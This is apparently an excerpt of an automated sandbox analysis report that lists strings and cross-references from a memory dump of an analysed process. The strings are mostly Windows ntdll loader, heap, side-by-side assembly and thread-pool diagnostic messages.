                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                        Strings
                                                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01178A3D
                                                                                                                                        • VerifierDebug, xrefs: 01178CA5
                                                                                                                                        • HandleTraces, xrefs: 01178C8F
                                                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01178B8F
                                                                                                                                        • VerifierFlags, xrefs: 01178C50
                                                                                                                                        • VerifierDlls, xrefs: 01178CBD
                                                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01178A67
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                        Strings
                                                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011499ED
                                                                                                                                        • LdrpInitShimEngine, xrefs: 011499F4, 01149A07, 01149A30
                                                                                                                                        • apphelp.dll, xrefs: 010E6496
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01149A11, 01149A3A
                                                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01149A2A
                                                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01149A01
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                        Strings
                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011621BF
                                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01162160, 0116219A, 011621BA
                                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0116219F
                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01162165
                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01162178
                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01162180
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                        • API String ID: 0-861424205
                                                                                                                                        Strings
                                                                                                                                        • LdrpInitializeProcess, xrefs: 0112C6C4
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0112C6C3
                                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01168177, 011681EB
                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01168181, 011681F5
                                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 011681E5
                                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01168170
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                        • API String ID: 0-475462383
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 01132DF0: LdrInitializeThunk.NTDLL ref: 01132DFA
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01130BA3
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01130BB6
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01130D60
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01130D74
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1404860816-0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                        • API String ID: 0-379654539
                                                                                                                                        Strings
                                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0112855E
                                                                                                                                        • LdrpInitializeProcess, xrefs: 01128422
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01128421
                                                                                                                                        • @, xrefs: 01128591
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-1918872054
                                                                                                                                        Strings
                                                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011621D9, 011622B1
                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011622B6
                                                                                                                                        • .Local, xrefs: 011228D8
                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 011621DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                        • API String ID: 0-1239276146
                                                                                                                                        Strings
                                                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01151028
                                                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011510AE
                                                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01150FE5
                                                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0115106B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                        • API String ID: 0-1468400865
                                                                                                                                        Strings
                                                                                                                                        • LdrpDynamicShimModule, xrefs: 0115A998
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0115A9A2
                                                                                                                                        • apphelp.dll, xrefs: 01112462
                                                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0115A992
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-176724104
                                                                                                                                        Strings
                                                                                                                                        • HEAP: , xrefs: 01103264
                                                                                                                                        • HEAP[%wZ]: , xrefs: 01103255
                                                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0110327D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                        • API String ID: 0-617086771
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                        • API String ID: 0-4253913091
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $@
                                                                                                                                        • API String ID: 0-1077428164
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                        • API String ID: 0-2779062949
                                                                                                                                        Strings
                                                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0115A10F
                                                                                                                                        • LdrpCheckModule, xrefs: 0115A117
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0115A121
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-161242083
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                        • API String ID: 0-1334570610
                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 011682E8
                                                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 011682D7
                                                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 011682DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-1783798831
                                                                                                                                        Strings
                                                                                                                                        • PreferredUILanguages, xrefs: 011AC212
                                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011AC1C5
                                                                                                                                        • @, xrefs: 011AC1F1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                        • API String ID: 0-2968386058
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                        • API String ID: 0-1373925480
                                                                                                                                        Strings
                                                                                                                                        • LdrpCheckRedirection, xrefs: 0117488F
                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01174899
                                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01174888
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                        • API String ID: 0-3154609507
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                        • API String ID: 0-2558761708
                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01172104
                                                                                                                                        • LdrpInitializationFailure, xrefs: 011720FA
                                                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 011720F3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-2986994758
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: #%u
                                                                                                                                        • API String ID: 48624451-232158463
                                                                                                                                        Strings
                                                                                                                                        • LdrResSearchResource Exit, xrefs: 010FAA25
                                                                                                                                        • LdrResSearchResource Enter, xrefs: 010FAA13
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                        • API String ID: 0-4066393604
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: `$`
                                                                                                                                        • API String ID: 0-197956300
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$MUI
                                                                                                                                        • API String ID: 0-17815947
                                                                                                                                        Strings
                                                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010F063D
                                                                                                                                        • kLsE, xrefs: 010F0540
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                        • API String ID: 0-2547482624
                                                                                                                                        Strings
                                                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 010FA2FB
                                                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 010FA309
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                        • API String ID: 0-2876891731
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: MUI
                                                                                                                                        • API String ID: 0-1339004836
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: GlobalTags
                                                                                                                                        • API String ID: 0-1106856819
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .mui
                                                                                                                                        • API String ID: 0-1199573805
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: EXT-
                                                                                                                                        • API String ID: 0-1948896318
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: BinaryHash
                                                                                                                                        • API String ID: 0-2202222882
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: #
                                                                                                                                        • API String ID: 0-1885708031
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: BinaryName
